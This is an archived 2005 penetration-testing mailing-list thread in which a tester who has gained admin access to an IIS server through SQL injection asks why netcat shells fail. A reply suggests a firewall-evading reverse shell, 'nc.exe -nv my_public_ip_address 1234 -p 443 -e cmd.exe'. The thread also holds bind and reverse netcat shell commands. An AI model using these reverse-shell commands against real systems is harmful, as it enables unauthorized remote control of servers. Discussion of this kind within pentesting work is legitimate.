Penetration Testing mailing list archives
RE: Netcat Question
From: "Bartholomew, Brian J" <BartholomewBJ () state gov>
Date: Wed, 1 Jun 2005 10:24:16 -0400
My guess is that you have a FW sitting in front of the web server that is not allowing either inbound connections to port 8000, or outbound connections to 443. Normal FWs are set to only allow inbound 80 and 443 to the web servers, and outbound from those ports, not to those ports. Try modifying the second command to add the -p switch and specify the port 443. Then change the destination port on your system at home to be some ephemeral port. Something like: nc.exe –nv my_public_ip_address 1234 -p 443 –e cmd.exe See if that works. - Brian -----Original Message----- From: intel96 [mailto:intel96 () bellsouth net] Sent: Tuesday, May 31, 2005 6:39 PM To: pen-test () securityfocus com Subject: Netcat Question To All, I am conducting a pentest and I have been able to upload netcat to the web server (IIS 6.0 - with ports 80/443 open) via ftp. I have tried to establish a shell both ways, but cannot get it to work: On the web server I first tried: nc.exe –l –p 8000 –e cmd.exe When I tried to connect to port 8000 on the web server I received a timeout on my side. I have also tried this with port 53 and it also did not work. I than tried: nc.exe –nv my_public_ip_address 443 -d –e cmd.exe This did not work either. I did not see the remote system trying to connect to my system via my logs. I have access to upload anything to the system and run most commands via sql injections. I have administrator level access on the system at this time. Any ideas on how I can get this shell to work? Or there any other commands that may provide me more access or allow me to dump the database? Thanks, Intel96
Current thread:
- RE: Netcat Question Meidinger Chris (Jun 01)
- <Possible follow-ups>
- Netcat Question intel96 (Jun 01)
- RE: Netcat Question Miguel Dilaj (Jun 01)
- Re: Netcat Question Jordan . DelGrande (Jun 01)
- Re: Netcat Question Mariano Nuñez Di Croce (Jun 01)
- Re: Netcat Question atomek (Jun 01)
- RE: Netcat Question Bartholomew, Brian J (Jun 01)